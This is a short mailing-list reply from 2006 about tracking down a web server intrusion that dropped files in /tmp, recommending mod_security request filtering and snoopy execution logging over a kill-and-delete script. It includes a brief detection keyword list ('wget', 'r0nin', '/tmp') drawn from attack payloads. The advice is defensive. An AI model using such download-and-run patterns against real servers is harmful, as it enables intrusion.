On Fri, Apr 07, 2006 at 02:51:35PM -0700, Joe Emenaker wrote: > I could never find anything glaring in the logs. So, I eventually had to > write a script that just watched the /tmp and /var/tmp directories every > few seconds for files with the distinctive signature. If found, it > killed all of the processes created by them and deleted them. It also > recorded the time that it happened so I could narrow down how many log > entries I had to scrutinize. That is an appalling approach to dealing with the problem, especially if you have an old kernel which could allow privilege escalation. There are several approaches to actually tracking down the source of the problem. The most obvious is to use the mod_security module for Apache to log incoming payloads and ban requests containing strings such as 'wget', 'r0nin', '/tmp', etc. Another approach would be to install 'snoopy', or similar, to log *every* executed script upon a host and then walk backwards from the initial intrusion to the execution of the script. Steve --
Attachment:
signature.asc
Description: Digital signature